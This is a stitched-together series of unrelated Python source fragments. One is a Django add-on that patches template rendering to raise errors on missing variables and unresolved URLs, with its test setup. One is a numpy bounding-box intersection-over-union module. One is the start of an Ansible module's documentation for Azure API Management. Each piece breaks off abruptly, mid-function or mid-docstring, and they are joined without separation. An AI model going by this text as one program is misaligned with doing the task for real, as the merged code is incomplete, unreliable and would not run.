def extract_first_second_from_branch(_cond):
# type: (Any) -> Iterator[TemplateLiteral]
first = getattr(_cond, "first", None)
second = getattr(_cond, "second", None)
if first is not None and first:
for subcond in extract_first_second_from_branch(first):
yield subcond
if second is not None and second:
for subcond in extract_first_second_from_branch(second):
yield subcond
if first is None and second is None:
yield _cond
for index, condition_nodelist in enumerate(self.conditions_nodelists, start=1):
condition, nodelist = condition_nodelist
if condition is not None:
for _cond in extract_first_second_from_branch(condition):
if _cond not in conditions_seen:
conditions.append(_cond)
conditions_seen.add(_cond)
for condition in conditions:
if hasattr(condition, "value") and hasattr(condition.value, "resolve"):
condition.value.resolve(context)
return old_if_render(self, context)
URL_BLACKLIST = (
# Admin login
("admin_password_reset", "password_reset_url"),
# Admin header (every page)
("django-admindocs-docroot", "docsroot"),
) # type: Tuple[Tuple[Text, Text], ...]
def url_blacklist():
# type: () -> Tuple[Tuple[Text, Text], ...]
# TODO: make this memoized/cached?
return URL_BLACKLIST + tuple(getattr(settings, "SHOUTY_URL_BLACKLIST", ()))
def new_url_render(self, context):
# type: (URLNode, Any) -> Any
"""
Call the original render method, and if it returns nothing AND has been
put into the context, raise an exception.
eg:
{% url '...' %} is fine. Will raise NoReverseMatch anyway.
{% url '...' as x %} is fine if ... resolves.
{% url '...' as x %} will now blow up if ... doesn't put something sensible
into the context (it should've thrown a NoReverseMatch)
"""
__traceback_hide__ = settings.DEBUG
value = old_url_render(self, context)
outvar = self.asvar
if outvar is not None and context[outvar] == "":
key = (str(self.view_name.var), str(outvar))
if key not in url_blacklist():
try:
(
template_name,
exc_info,
all_template_names,
) = create_exception_with_template_debug(context, outvar, self)
except Exception as e2:
logger.warning(
"failed to create template_debug information", exc_info=e2
)
# In case my code is terrible, and raises an exception, let's
# just carry on and let Django try for itself to set up relevant
# debug info
template_name = UNKNOWN_SOURCE
all_template_names = [template_name]
exc_info = {}
            msg = "{{% url {token!s} ... as {asvar!s} %}} in template '{template}' did not resolve.\nYou may silence this globally by adding {key!r} to settings.SHOUTY_URL_BLACKLIST".format(
token=self.view_name,
asvar=outvar,
key=key,
template=template_name,
)
exc = MissingVariable(
msg,
token=key,
template_name=template_name,
all_template_names=all_template_names,
)
if context.template.engine.debug and exc_info is not None:
exc_info["message"] = msg
exc.template_debug = exc_info
raise exc
return value
def patch(invalid_variables, invalid_urls):
# type: (bool, bool) -> bool
"""
Monkeypatch the Django Template Language's Variable class, replacing
the `_resolve_lookup` method with `new_resolve_lookup` in this module.
Also allows for turning on loud errors if using `{% url ... as outvar %}`
where the url resolved to nothing.
Calling it multiple times should be a no-op
"""
if not settings.DEBUG:
return False
if invalid_variables is True:
patched_var = getattr(Variable, "_shouty", False)
if patched_var is False:
Variable._resolve_lookup = new_resolve_lookup
Variable._shouty = True
# Provides exhaustive if/elif/else checking as well as all conditional
# in context checking ...
patched_if = getattr(IfNode, "_shouty", False)
if patched_if is False:
IfNode.render = new_if_render
IfNode._shouty = True
if invalid_urls is True:
patched_url = getattr(URLNode, "_shouty", False)
if patched_url is False:
URLNode.render = new_url_render
URLNode._shouty = True
return True
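# A hedged configuration sketch for a project's settings.py (the setting names are
# the ones read by this module; the values shown are illustrative only):
#
#   DEBUG = True                       # patch() is a no-op unless DEBUG is on
#   SHOUTY_VARIABLES = True
#   SHOUTY_URLS = True
#   SHOUTY_URL_BLACKLIST = (("my_view_name", "my_outvar"),)
#   SHOUTY_VARIABLE_BLACKLIST = {"chef": ("vendor/cooking.html",)}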
def check_user_blacklists(app_configs, **kwargs):
# type: (Any, **Any) -> List[checks.Error]
errors = []
user_blacklist = getattr(settings, "SHOUTY_VARIABLE_BLACKLIST", ())
if hasattr(user_blacklist, "items") and callable(user_blacklist.items):
for var, templates in user_blacklist.items():
if force_text(var) != var:
errors.append(
checks.Error(
"Expected key {!r} to be a string".format(var),
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
if force_text(templates) == templates:
errors.append(
checks.Error(
"Key {} has it's list of templates as a string".format(var),
hint="Templates should be like: ('template.html', 'template2.html')",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
try:
template_count = len(templates)
except Exception:
errors.append(
checks.Error(
"Key {} has an unexpected templates defintion".format(var),
hint="The value for templates should be like: ('template.html', 'template2.html')",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
else:
if var == ANY_VARIABLE and template_count < 1:
errors.append(
checks.Error(
"Magic variable * has an unexpected templates defintion".format(
var
),
hint="Using * requires you to specify a specific template (or set of templates) to ignore",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
elif var == ANY_VARIABLE and ANY_TEMPLATE in templates:
errors.append(
checks.Error(
"Magic variable * has an unexpected templates defintion".format(
var
),
hint="Using * for both the variable and template isn't supported, use settings.SHOUTY_VARIABLES = False",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
elif template_count < 1:
errors.append(
checks.Error(
"Key {} has an unexpected templates defintion".format(var),
hint="There are no templates whitelisted, nor the magic '*' value",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
else:
if force_text(user_blacklist) == user_blacklist:
errors.append(
checks.Error(
"Setting appears to be a string",
hint="Should be a sequence or dictionary (eg: ['myvar', 'myvar2'])",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
try:
iter(user_blacklist)
except TypeError:
errors.append(
checks.Error(
"Setting doesn't appear to be a sequence",
hint="Should be a sequence or dictionary (eg: ['myvar', 'myvar2'])",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
else:
for var in user_blacklist:
if force_text(var) != var:
errors.append(
checks.Error(
"Expected {!r} to be a string".format(var),
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
return errors
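# Hedged examples of SHOUTY_VARIABLE_BLACKLIST shapes that pass the checks above
# (variable and template names are illustrative):
#
#   SHOUTY_VARIABLE_BLACKLIST = ("chef", "ingredients")              # plain sequence of names
#   SHOUTY_VARIABLE_BLACKLIST = {"chef": ("vendor/cooking.html",)}   # name -> templates
#   SHOUTY_VARIABLE_BLACKLIST = {"chef": ("*",)}                     # name ignored in any template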
class Shout(AppConfig): # type: ignore
"""
Applies the patch automatically if enabled.
If `shouty` or `shouty.Shout` is added to INSTALLED_APPS only.
"""
name = "shouty"
def ready(self):
# type: () -> bool
logger.info("Applying shouty templates patch")
checks.register(check_user_blacklists, checks.Tags.templates)
return patch(
invalid_variables=getattr(settings, "SHOUTY_VARIABLES", True),
invalid_urls=getattr(settings, "SHOUTY_URLS", True),
)
default_app_config = "shouty.Shout"
if __name__ == "__main__":
import os
try:
import coverage
except ImportError:
sys.stdout.write("coverage not installed\n")
cov = None
else:
sys.stdout.write("using coverage\n")
cov = coverage.Coverage(
include=["shouty.py"], branch=True, check_preimported=True
)
cov.start()
from unittest import skipIf
from contextlib import contextmanager
from django.test import TestCase, SimpleTestCase, override_settings
from django.test.runner import DiscoverRunner
from django.views.debug import ExceptionReporter
from django.test.client import RequestFactory
from django import setup as django_setup, VERSION as DJANGO_VERSION
from django.conf import settings as test_settings
from django.utils.functional import SimpleLazyObject
EXTRA_INSTALLED_APPS = () # type: Tuple[Text, ...]
try:
import admin_honeypot
if DJANGO_VERSION[0:2] > (1, 9):
EXTRA_INSTALLED_APPS += ("admin_honeypot",)
except ImportError:
pass
try:
import crispy_forms
EXTRA_INSTALLED_APPS += ("crispy_forms",)
except ImportError:
pass
def urlpatterns():
# type: () -> Tuple[Any, ...]
try:
from django.urls import re_path, include
except ImportError:
from django.conf.urls import url as re_path, include
from django.contrib import admin
patterns = () # type: Tuple[Any, ...]
if "admin_honeypot" in EXTRA_INSTALLED_APPS:
patterns += (re_path(r"^admin_honeypot/", include("admin_honeypot.urls")),)
patterns += (
re_path(r"^admin/doc/", include("django.contrib.admindocs.urls")),
re_path(r"^admin/", admin.site.urls),
)
return patterns
if DJANGO_VERSION[0:2] <= (1, 9):
version_specific_settings = {
"MIDDLEWARE_CLASSES": [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
]
}
else:
version_specific_settings = {
"MIDDLEWARE": [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
]
}
test_settings.configure(
DEBUG=True,
SECRET_KEY="test-test-test-test-test-test-test-test-test-test-test-test",
DATABASES={
"default": {"ENGINE": "django.db.backends.sqlite3", "NAME": ":memory:"}
},
INSTALLED_APPS=(
"django.contrib.contenttypes",
"django.contrib.auth",
"django.contrib.admin",
"django.contrib.admindocs",
"django.contrib.sessions",
"django.contrib.messages",
"shouty",
)
+ EXTRA_INSTALLED_APPS,
TEMPLATES=[
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": (
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"django.template.context_processors.request",
)
},
},
],
ROOT_URLCONF=SimpleLazyObject(urlpatterns),
SHOUTY_VARIABLES=True,
SHOUTY_URLS=True,
LOGGING={
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"console": {
"format": "[%(levelname)s] %(name)s -> %(funcName)s -> %(message)s"
}
},
"handlers": {
"console": {"class": "logging.StreamHandler", "formatter": "console"},
},
"root": {
"handlers": ["console"],
"level": "ERROR",
},
"loggers": {
"shouty": {
"handlers": ["console"],
"level": os.environ.get("SHOUTY_LOGGING", "WARNING").upper(),
"propagate": False,
},
"django.request": {
"handlers": ["console"],
"level": "ERROR",
"propagate": False,
},
},
},
**version_specific_settings
)
django_setup()
from django.template import Template, Context as CTX
from django.forms import IntegerField
from django.template.loader import render_to_string
class TMPL(Template): # type: ignore
def __init__(self, *args, **kwargs):
# type: (Any, Any) -> None
super(TMPL, self).__init__(*args, **kwargs)
self.engine.debug = True
class CustomAssertions(object):
def assertStatusCode(self, resp, value):
# type: (Any, int) -> None
if resp.status_code != value:
self.fail(
"Expected status code {}, response had code {}".format(
value, resp.status_code
)
)
@contextmanager
def assertRaisesWithTemplateDebug(
self, exception_type, exception_repr, debug_data
):
# type: (Type[Exception], Text, Dict[Text, Any]) -> Iterator[None]
try:
yield
except exception_type as exc:
self.assertIn(str(exception_repr), str(exc)) # type: ignore
req = RequestFactory().get("/")
reporter = ExceptionReporter(
request=req,
exc_type=exception_type,
exc_value=exc,
tb=None,
is_email=True,
)
traceback_data = reporter.get_traceback_data()
template_debug = traceback_data.get(
"template_info", {}
) # type: Dict[Text, Any]
if template_debug == {}: # type: ignore
self.fail(
"Missing template_debug attribute from {}".format(exc)
) # type: ignore
if not debug_data:
self.fail( # type: ignore
"No data provided to check against {}".format(template_debug)
)
expected = {}
# calc/iou.py
# coding = utf-8
import numpy as np
from colorama import init, Fore, Back, Style
"""
Summary:
IoU Calculate:
the IoU between Box_1 and Box_2:
F(x): if x < 0 , =0; else, =x;
        Intersection: F(min_bottom - max_top) * F(min_right - max_left)
        IoU: Intersection / (Area_Box_1 + Area_Box_2 - Intersection)
max_top = max(Box_1_top_y, Box_2_top_y)
min_bottom = min(Box_1_bottom_y, Box_2_bottom_y)
min_right = min(Box_1_right_x, Box_2_right_x)
max_left = max(Box_1_left_x, Box_2_left_x)
base on different parameter , generate different way to calculate the max_top, min_bottom, min_right and
max_left
max_top
===
|
----|--
Box_1<---| | |--->min_right
| ----|-----------
IoU<---|--|////| |
max_left<---|--|////| |
| |////| |
--|---- |
| | |
| | |-----> Box_2
===| |
min_bottom----------------
"""
def __iou_chw(rect1, rect2):
"""
calculate the IoU between rect1 and rect2, use the [center_y, center_x, height, width]
:param rect1:
:param rect2:
:return:
"""
y1, x1, h1, w1 = rect1
y2, x2, h2, w2 = rect2
if (abs(x1 - x2) < ((w1 + w2) / 2.0)) and (abs(y1 - y2) < ((h1 + h2) / 2.0)):
left = max((x1 - (w1 / 2.0)), (x2 - (w2 / 2.0)))
upper = max((y1 - (h1 / 2.0)), (y2 - (h2 / 2.0)))
right = min((x1 + (w1 / 2.0)), (x2 + (w2 / 2.0)))
bottom = min((y1 + (h1 / 2.0)), (y2 + (h2 / 2.0)))
inter_w = abs(left - right)
inter_h = abs(upper - bottom)
inter_square = inter_w * inter_h
union_square = (w1 * h1) + (w2 * h2) - inter_square
iou = inter_square / union_square * 1.0
inter_rect = [(upper + bottom) * 0.5, (left + right) * 0.5, bottom - upper, right - left]
else:
iou = 0
inter_rect = [None, None, None, None]
pass
return iou, inter_rect
pass
def __to_chw(*rects, **options):
TP = options.pop('TP', False)
LHW = options.pop('LHW', False)
CHW = options.pop('CHW', False)
assert np.count_nonzero([TP, LHW, CHW]) == 1, \
'TP, LHW, CHW should have only one True, but {0}'.format(np.count_nonzero([TP, LHW, CHW]))
assert len(rects) >= 1, 'no input rect'
get = []
if TP:
[get.append([(i[0] + i[2]) * 0.5, (i[1] + i[3]) * 0.5, i[2] - i[0], i[3] - i[1]]) for i in rects]
return get
if LHW:
[get.append([i[0] + 0.5 * i[2], i[1] + 0.5 * i[3], i[2], i[3]]) for i in rects]
return get
if CHW:
return rects
pass
def calc_iou(*rects, **options):
"""
多个rects计算iou存在错误
计算一组rects的iou
:param rects: 一组rects
:param options:
:keyword TP : rects使用两点(左上, 右下)表示 [left_y, left_x, right_y, right_x]
:keyword LHW : rects使用左上与高宽表示 [left_y, left_x, height, width]
:keyword CHW : rects使用中心点与高宽表示 [center_y, center_x, height, width]
:return:
"""
# fixme:多个rects计算iou存在error
TP = options.pop('TP', False)
LHW = options.pop('LHW', False)
CHW = options.pop('CHW', False)
rects = __to_chw(*rects, TP=TP, LHW=LHW, CHW=CHW)
inter_rect = rects[0]
iou = None
for i in range(1, len(rects)):
iou, inter_rect_new = __iou_chw(inter_rect, rect2=rects[i])
if None in inter_rect_new:
return iou
else:
inter_rect = inter_rect_new
return iou
pass
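# Hedged usage sketch of calc_iou above (coordinates are illustrative):
#
#   box_a = [1.0, 1.0, 3.0, 3.0]      # TP form: [left_y, left_x, right_y, right_x]
#   box_b = [2.0, 2.0, 4.0, 4.0]
#   calc_iou(box_a, box_b, TP=True)   # -> 1 / 7 ≈ 0.143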
"""
Implement calc_iou_matrix_thw:
base on center_y_x and height width, there is algorithm:
max_top: max(-0.5 * group1_h, group_2_y - 0.5 * group2_h)
min_bottom: min(0.5 * group1_h, group_2_y + 0.5 * group2_h)
min_right: min(0.5 * group1_w, group2_x + 0.5 * group2_w)
        max_left: max(-0.5 * group1_w, group2_x - 0.5 * group2_w)
use[[center_y, center_x, height, width], ....] as an example:
in order to create the IoU matrix
we should create group1_Box_M IoU group2_Box_N
we make group1 data repeat n cross row
just like:
-0.5 * group1_h:
[[group1_box_1_top_y, ..n.., group1_box_1_top_y],
[group1_box_2_top_y, ..n.., group1_box_2_top_y],
:
m
:,
[group1_box_m_top_y, ..n.., group1_box_m_top_y],
]
we make group2 data repeat m cross col
and group2 just make more one process transpose
and then use the algorithm
get then max_top, min_bottom, min_right, max_left Matrix
and then make element which lower than zeros zeroed
finally generate a m x n IoU matrix
"""
def calc_iou_matrix_ohw(
group1,
group2,
group1_h_index=2,
group1_w_index=3,
group2_y_index=0,
group2_x_index=1,
group2_h_index=2,
group2_w_index=3
):
"""
this function is for standard group1 IoU random group2
which means that the box in the group1 have the same center_y_x, and group2 carry the data
[offset_y, offset_x, height, width], offset means the offset pixel to the standard box center
calculate the IoU matrix base on group1 and group2 which carry the parameter top_y, top_x, height and width
:param group1: [[height, width], ....] according to default group1_*_index
:param group2: [[offset_y, offset_x, height, width], ...] according to default group2_*_index
:param group1_h_index: parameter represent the index of h in group1
:param group1_w_index: parameter represent the index of 2 in group1
:param group2_y_index: parameter represent the index of y in group2
:param group2_x_index: parameter represent the index of x in group2
:param group2_h_index: parameter represent the index of h in group2
:param group2_w_index: parameter represent the index of w in group2
:return:
group1_box_0 iou group2_box_0, group1_box_0 iou group2_box_1, ..., group1_box_0 iou group2_box_(n - 1), group1_box_0 iou group2_box_n
, , , ,
group1_box_1 iou group2_box_0, ... , ..., ... , group1_box_1 iou group2_box_n
,
... ...
,
... ...
,
... ...
,
group1_box_m iou group2_box_0, ... , ..., ... , group1_box_m iou group2_box_n
"""
g_1_matrix = np.array(group1)
g_2_matrix = np.array(group2)
group_1_amount = len(g_1_matrix)
group_2_amount = len(g_2_matrix)
g_1_area_cross_row = (g_1_matrix[:, group1_h_index] * g_1_matrix[:, group1_w_index]).repeat(
group_2_amount).reshape([group_1_amount, group_2_amount])
g_2_area_cross_col = (g_2_matrix[:, group2_h_index] * g_2_matrix[:, group2_w_index]).repeat(
group_1_amount).reshape(group_2_amount, group_1_amount).T
g_1_top_y_matrix_cross_row = (-0.5 * g_1_matrix[:, group1_h_index]).repeat(
group_2_amount).reshape([group_1_amount, group_2_amount])
g_1_bottom_y_matrix_cross_row = (0.5 * g_1_matrix[:, group1_h_index]).repeat(
group_2_amount).reshape([group_1_amount, group_2_amount])
g_1_right_x_matrix_cross_row = (0.5 * g_1_matrix[:, group1_w_index]).repeat(
group_2_amount).reshape([group_1_amount, group_2_amount])
g_1_left_x_matrix_cross_row = (-0.5 * g_1_matrix[:, group1_w_index]).repeat(
group_2_amount).reshape([group_1_amount, group_2_amount])
g_2_top_y_matrix_cross_col = (g_2_matrix[:, group2_y_index] - 0.5 * g_2_matrix[:, group2_h_index]).repeat(
group_1_amount).reshape([group_2_amount, group_1_amount]).T
g_2_bottom_y_matrix_cross_col = (g_2_matrix[:, group2_y_index] + 0.5 * g_2_matrix[:, group2_h_index]).repeat(
group_1_amount).reshape(group_2_amount, group_1_amount).T
g_2_right_x_matrix_cross_col = (g_2_matrix[:, group2_x_index] + 0.5 * g_2_matrix[:, group2_w_index]).repeat(
group_1_amount).reshape([group_2_amount, group_1_amount]).T
    g_2_left_x_matrix_cross_col = (g_2_matrix[:, group2_x_index] - 0.5 * g_2_matrix[:, group2_w_index]).repeat(
group_1_amount).reshape(group_2_amount, group_1_amount).T
# calculate the overlap box
max_top = np.max(np.concatenate((np.expand_dims(g_1_top_y_matrix_cross_row, -1),
np.expand_dims(g_2_top_y_matrix_cross_col, -1)), -1), -1)
min_bottom = np.min(np.concatenate((np.expand_dims(g_1_bottom_y_matrix_cross_row, -1),
np.expand_dims(g_2_bottom_y_matrix_cross_col, -1)), -1), -1)
min_right = np.min(np.concatenate((np.expand_dims(g_1_right_x_matrix_cross_row, -1),
np.expand_dims(g_2_right_x_matrix_cross_col, -1)), -1), -1)
max_left = np.max(np.concatenate((np.expand_dims(g_1_left_x_matrix_cross_row, -1),
np.expand_dims(g_2_left_x_matrix_cross_col, -1)), -1), -1)
# calculate cross area
crossed_height = min_bottom - max_top
crossed_width = min_right - max_left
# apply ReLU
crossed_height[crossed_height < 0] = 0
crossed_width[crossed_width < 0] = 0
iou_area = crossed_height * crossed_width
iou = iou_area / (g_1_area_cross_row + g_2_area_cross_col - iou_area)
return iou
pass
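# Hedged usage sketch of calc_iou_matrix_ohw (values are illustrative; group1 rows
# only need valid h/w columns because the standard boxes share a single centre):
#
#   group1 = np.array([[0.0, 0.0, 10.0, 10.0]])              # one 10x10 standard box
#   group2 = np.array([[0.0, 0.0, 10.0, 10.0],
#                      [5.0, 5.0, 10.0, 10.0]])              # [offset_y, offset_x, h, w]
#   calc_iou_matrix_ohw(group1, group2)                      # -> [[1.0, ~0.143]]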
"""
Implement calc_iou_matrix_thw:
base on center_y_x and height width, there is algorithm:
max_top: max(group1_y, group_2_y)
min_bottom: min(group1_y + group1_h, group_2_y + group2_h)
min_right: min(group_1_x + group1_w, group2_x + group2_w)
        max_left: max(group_1_x, group2_x)
use[[center_y, center_x, height, width], ....] as an example:
in order to create the IoU matrix
we should create group1_Box_M IoU group2_Box_N
we make group1 data repeat n cross row
just like:
group1_y:
[[group1_box_1_top_y, ..n.., group1_box_1_top_y],
[group1_box_2_top_y, ..n.., group1_box_2_top_y],
:
m
:,
[group1_box_m_top_y, ..n.., group1_box_m_top_y],
]
we make group2 data repeat m cross col
and group2 just make more one process transpose
and then use the algorithm
get then max_top, min_bottom, min_right, max_left Matrix
and then make element which lower than zeros zeroed
finally generate a m x n IoU matrix
"""
def calc_iou_matrix_thw(
group1,
group2,
group1_y_index=0,
group1_x_index=1,
group1_h_index=2,
group1_w_index=3,
group2_y_index=0,
group2_x_index=1,
group2_h_index=2,
group2_w_index=3
):
"""
calculate the IoU matrix base on group1 and group2 which carry the parameter top_y, top_x, height and width
:param group1: [[top_y, top_x, height, width], ....] according to default group1_*_index
:param group2: [[top_y, top_x, height, width], ...] according to default group2_*_index
:param group1_y_index: parameter represent the index of y in group1
:param group1_x_index: parameter represent the index of x in group1
:param group1_h_index: parameter represent the index of h in group1
:param group1_w_index: parameter represent the index of 2 in group1
:param group2_y_index: parameter represent the index of y in group2
:param group2_x_index: parameter represent the index of x in group2
:param group2_h_index: parameter represent the index of h in group2
:param group2_w_index: parameter represent the index of w in group2
:return:
group1_box_0 iou group2_box_0, group1_box_0 iou group2_box_1, ..., group1_box_0 iou group2_box_(n - 1), group1_box_0 iou group2_box_n
, , , ,
group1_box_1 iou group2_box_0, ... , ..., ... , group1_box_1 iou group2_box_n
,
... ...
,
... ...
,
... ...
,
group1_box_m iou group2_box_0, ... , ..., ... , | |
#!/usr/bin/python
#
# Copyright (c) 2019 <NAME>, (@zikalino)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_apimanagementapi
version_added: '2.9'
short_description: Manage Azure Api instance.
description:
- 'Create, update and delete instance of Azure Api.'
options:
resource_group:
description:
- The name of the resource group.
required: true
type: str
service_name:
description:
- The name of the API Management service.
required: true
type: str
api_id:
description:
- >-
API revision identifier. Must be unique in the current API Management
service instance. Non-current revision has ;rev=n as a suffix where n is
the revision number.
required: true
type: str
description:
description:
- Description of the API. May include HTML formatting tags.
type: str
authentication_settings:
description:
- Collection of authentication settings included into this API.
type: dict
suboptions:
o_auth2:
description:
- OAuth2 Authentication settings
type: dict
suboptions:
authorization_server_id:
description:
- OAuth authorization server identifier.
type: str
scope:
description:
- operations scope.
type: str
openid:
description:
- OpenID Connect Authentication Settings
type: dict
suboptions:
openid_provider_id:
description:
- OAuth authorization server identifier.
type: str
bearer_token_sending_methods:
description:
- How to send token to the server.
type: list
subscription_key_required:
description:
- >-
Specifies whether subscription key is required during call to this
API, true - API is included into closed products only, false - API
is included into open products alone, null - there is a mix of
products.
type: boolean
subscription_key_parameter_names:
description:
- Protocols over which API is made available.
type: dict
suboptions:
header:
description:
- Subscription key header name.
type: str
query:
description:
- Subscription key query string parameter name.
type: str
type:
description:
- Resource type for API Management resource.
type: str
api_revision:
description:
- >-
Describes the Revision of the Api. If no value is provided, default
revision 1 is created
type: str
api_version:
description:
- Indicates the Version identifier of the API if the API is versioned
type: str
is_current:
description:
- Indicates if API revision is current api revision.
type: boolean
api_revision_description:
description:
- Description of the Api Revision.
type: str
api_version_description:
description:
- Description of the Api Version.
type: str
api_version_set_id:
description:
- A resource identifier for the related ApiVersionSet.
type: str
subscription_required:
description:
- >-
Specifies whether an API or Product subscription is required for
accessing the API.
type: boolean
source_api_id:
description:
- API identifier of the source API.
type: str
display_name:
description:
- API name. Must be 1 to 300 characters long.
type: str
service_url:
description:
- >-
Absolute URL of the backend service implementing this API. Cannot be
more than 2000 characters long.
type: str
path:
description:
- >-
Relative URL uniquely identifying this API and all of its resource paths
within the API Management service instance. It is appended to the API
endpoint base URL specified during the service instance creation to form
a public URL for this API.
required: true
type: str
protocols:
description:
- Describes on which protocols the operations in this API can be invoked.
type: list
api_version_set:
description:
- Version set details
type: dict
suboptions:
id:
description:
- >-
Identifier for existing API Version Set. Omit this value to create a
new Version Set.
type: str
name:
description:
- The display Name of the API Version Set.
type: str
description:
description:
- Description of API Version Set.
type: str
versioning_scheme:
description:
- >-
            A value that determines where the API Version identifier will be
            located in an HTTP request.
type: str
version_query_name:
description:
- >-
Name of query parameter that indicates the API Version if
versioningScheme is set to `query`.
type: str
version_header_name:
description:
- >-
Name of HTTP header parameter that indicates the API Version if
versioningScheme is set to `header`.
type: str
value:
description:
- Content value when Importing an API.
type: str
format:
description:
- Format of the Content in which the API is getting imported.
type: str
wsdl_selector:
description:
- Criteria to limit import of WSDL to a subset of the document.
type: dict
suboptions:
wsdl_service_name:
description:
- Name of service to import from WSDL
type: str
wsdl_endpoint_name:
description:
- Name of endpoint(port) to import from WSDL
type: str
api_type:
description:
- >-
Type of Api to create. <br> * `http` creates a SOAP to REST API <br> *
`soap` creates a SOAP pass-through API .
type: str
is_online:
description:
- Indicates if API revision is accessible via the gateway.
type: boolean
id:
description:
- Resource ID.
type: str
name:
description:
- Resource name.
type: str
state:
description:
- Assert the state of the Api.
- Use C(present) to create or update an Api and C(absent) to delete it.
default: present
choices:
- absent
- present
extends_documentation_fragment:
- azure
author:
- <NAME> (@zikalino)
'''
EXAMPLES = '''
- name: ApiManagementCreateApiUsingOai3Import
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
path: petstore
value: >-
https://raw.githubusercontent.com/OAI/OpenAPI-Specification/master/examples/v3.0/petstore.yaml
format: openapi-link
- name: ApiManagementCreateApiUsingSwaggerImport
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
path: petstore
value: 'http://petstore.swagger.io/v2/swagger.json'
format: swagger-link-json
- name: ApiManagementCreateApiUsingWadlImport
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
path: collector
value: >-
https://developer.cisco.com/media/wae-release-6-2-api-reference/wae-collector-rest-api/application.wadl
format: wadl-link-json
- name: ApiManagementCreateSoapToRestApiUsingWsdlImport
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
path: currency
value: 'http://www.webservicex.net/CurrencyConvertor.asmx?WSDL'
format: wsdl-link
wsdl_selector:
wsdl_service_name: CurrencyConvertor
wsdl_endpoint_name: CurrencyConvertorSoap
- name: ApiManagementCreateSoapPassThroughApiUsingWsdlImport
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
path: currency
value: 'http://www.webservicex.net/CurrencyConvertor.asmx?WSDL'
format: wsdl-link
wsdl_selector:
wsdl_service_name: CurrencyConvertor
wsdl_endpoint_name: CurrencyConvertorSoap
api_type: soap
- name: ApiManagementCreateApi
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
description: apidescription5200
authentication_settings:
o_auth2:
authorization_server_id: authorizationServerId2283
scope: oauth2scope2580
subscription_key_parameter_names:
header: header4520
query: query3037
display_name: apiname1463
service_url: 'http://newechoapi.cloudapp.net/api'
path: newapiPath
protocols:
- https
- http
- name: ApiManagementCreateApiRevisionFromExistingApi
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
api_revision_description: Creating a Revision of an existing API
source_api_id: >-
/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group
}}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{
api_name }}
service_url: 'http://echoapi.cloudapp.net/apiv3'
path: echo
- name: ApiManagementCreateApiNewVersionUsingExistingApi
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
description: >-
Create Echo API into a new Version using Existing Version Set and Copy all
Operations.
api_version: v4
is_current: true
api_version_set_id: >-
/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group
}}/providers/Microsoft.ApiManagement/service/{{ service_name
}}/apiVersionSets/{{ api_version_set_name }}
subscription_required: true
source_api_id: >-
/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group
}}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{
api_name }}
display_name: Echo API2
service_url: 'http://echoapi.cloudapp.net/api'
path: echo2
protocols:
- http
- https
- name: ApiManagementCreateApiClone
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
description: Copy of Existing Echo Api including Operations.
is_current: true
subscription_required: true
source_api_id: >-
/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group
}}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{
api_name }}
display_name: Echo API2
service_url: 'http://echoapi.cloudapp.net/api'
path: echo2
protocols:
- http
- https
- name: ApiManagementCreateApiWithOpenIdConnect
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
description: >-
This is a sample server Petstore server. You can find out more about
Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net,
#swagger](http://swagger.io/irc/). For this sample, you can use the api
key `special-key` to test the authorization filters.
authentication_settings:
openid:
openid_provider_id: testopenid
bearer_token_sending_methods:
- authorizationHeader
subscription_key_parameter_names:
header: Ocp-Apim-Subscription-Key
query: subscription-key
display_name: Swagger Petstore
service_url: 'http://petstore.swagger.io/v2'
path: petstore
protocols:
- https
- name: ApiManagementCreateApiUsingImportOverrideServiceUrl
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
service_url: 'http://petstore.swagger.wordnik.com/api'
path: petstoreapi123
value: 'http://apimpimportviaurl.azurewebsites.net/api/apidocs/'
format: swagger-link
- name: ApiManagementUpdateApi
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
display_name: Echo API New
service_url: 'http://echoapi.cloudapp.net/api2'
path: newecho
- name: ApiManagementDeleteApi
